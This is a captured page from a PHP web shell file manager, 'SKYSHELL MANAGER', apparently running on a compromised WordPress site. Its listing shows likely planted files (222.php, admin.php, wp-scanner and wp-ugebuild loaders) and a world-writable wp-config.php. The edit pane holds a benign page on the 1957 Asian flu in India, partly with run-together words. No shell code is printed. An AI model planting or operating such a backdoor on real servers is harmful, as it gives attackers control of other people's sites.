📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: asian-flu.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="shortcut icon" href="assets//images/favicon.ico" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <title>Asian Flu - Flu Attack Defender</title> <!-- Bootstrap --> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <link href="assets/css/jquery-ui.css" rel="stylesheet"> <link href="assets/css/animate.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <!-- Main css --> <link href="assets/css/main.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Preloader --> <div class="preloader"> <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div><!-- /Preloader --> <!--Header Area--> <header class="header-area fixed-header"> <nav class="navbar navbar-expand-lg main-menu"> <div class="container"> <a class="navbar-brand" href="index.php"><img src="assets/images/logo3.png" class="d-inline-block align-top" alt=""></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="menu-toggle"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto"> <li class="nav-item"> <a class="nav-link dropdown-toggle" href="index.php" role="button" data-toggle="dropdown" aria-expanded="false">Home</a> </li> <li class="nav-item"><a class="nav-link" href="about.php">About us</a></li> <li class="nav-item active"><a class="nav-link" href="worst-pandemics.php">Worst Pandemics</a></li> <li class="nav-item"><a class="nav-link" href="testing.php">Testing Centers</a></li> <li class="nav-item"><a class="nav-link" href="contact.php">Contact</a></li> </ul> <div class="header-btn justify-content-end"> <a class="bttn-small btn-fill">+800 564 8367</a> </div> </div> </div> </nav> </header><!--/Header Area--> <!--breadcrumb area--> <section class="breadcrumb-area dark-overlay" style="background: url('assets/images/banners/1.jpg') no-repeat fixed;"> <div class="container"> <div class="row"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="banner-title"> <h2>Asian Flu in India </h2> </div> <ul> <li><a href="index.php">Home</a></li> <li>Blog Details</li> </ul> </div> </div> </div> </section> <!--/breadcrumb area--> <!--Blog Area--> <section class="blog-area section-padding-2"> <div class="container"> <div class="row"> <h4 style="margin-bottom:20px;">The 1957 pandemic of influenza in India </h4> <div class="col-xl-8 col-lg-8 col-md-8 col-sm-12"> <div class="blog-details" style="float:left;"> <div class="_3WlLe clearfix " style="line-height:35px;margin-right:3%;text-align:justify;"> <p style="text-align:justify"><b>Asian influenza</b> appears to have reached India via Madras in May 1957. The main pandemic wave swept through the subcontinent within the next 12 weeks; cases occurring thereafter represent the permanent infiltration of the new virus into the population. Between 19 May 1957 and 8 February 1958 there were reported 4 451 758 cases, with 1098 deaths. The author discusses the attack-rates by age-group, by occupational group, by State and in closed communities such as schools. The disease, in India as elsewhere, seems generally to have run a mild course, although nausea and vomiting and symptoms related to the nervous system were relatively frequently seen.</p> </div> </div> </div> <div class="col-xl-4 col-lg-4 col-md-4 col-sm-6" style="width:27%;float:right;"> <div class="site-sidebar"> <img src="assets/images/influenza.jpg" title="" alt=""/ style="width:100%;"> </div> </div> </div> <p style="line-height:35px;text-align:justify;"> A number of A/Asia/57 virus strains were isolated; their antigenic and biological characteristics are discussed in some detail. In view of the rapid spread of the pandemic, it proved impossible to prepare sufficient vaccine from the new strains in time for adequate field trials or mass immunization of the population.</p><br> <p style="line-height:35px;text-align:justify;">India was under British rule. An account given by the Sanitary Commissioner of Punjab</a> was quoted in the annual report, which gives us an idea of rapidity with which infection can be spread by infected individuals: “A recruit suffering from symptoms of influenza arrived at Narkanda and stayed a night with the Khansama of the hotel. Three days later the Khansama and his wife went down with influenza. Within a few yards of the Khansama’s house lived a blacksmith and the two used to inter-visit. A few days after the Khansama was attacked all the members of the blacksmith’s house were down with the disease. The postal peons used to frequent the Khansama’s house, with the result that they all contracted the disease and two of them died of it,” The postal peons served as a disseminating agency and “ in a short time the Hindustan Tibet Road was thoroughly infected.” Marwari traders, shopkeepers and even doctors, in fact, all who travelled by water, road or rail, were potential factors in distributing infection”. <br> Thespread of the epidemic through the Indian subcontinent, with particular reference to the chronological appearance of cases indifferent geographical areas,isshown in the map,which does not show,however,the intensity and duration of the outbreaks.The figures given against each town orcity represent theweekintheyearwhenthefirstcasesofinfluenzawerereported from the area,20 being the week when Madras was affected and 21 Bombay and Calcutta. For the sake of clarity,single numbers 1to6 are given against other areas,indicating weeks 21to26.The map is intended to show the speed with which the epidemic spread; with in six weeks from 18 May it had spread all over India.</div></div> </div> </div></div> </section> <!--Footer Area--> <!--Footer Area--> <!--Footer Area--> <footer class="footer-area section-padding black-bg-2"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-lg-10 col-md-12 col-sm-12"> <div class="footer-logo centered mb-4"> <img src="assets/images/logo3.png" alt=""> </div> <div class="footer-nav"> <ul> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subcribe.php">Subscribe</a></li> <li><a href="un-subscribe.php">Un-Subscribe</a></li> </ul> </div> <div class="copyright"> <p>Copyright © 2020 All Rights Reserved</p> </div> </div> </div> </div> </footer><!--/Footer Area--> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/js/jquery-migrate.js"></script> <script src="assets/js/jquery-ui.js"></script> <script src="assets/js/popper.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/magnific-popup.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/waypoints.min.js"></script> <script src="assets/js/jquery.counterup.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scrollUp.min.js"></script> <script src="assets//js/script.js"></script> </body> </html>
Save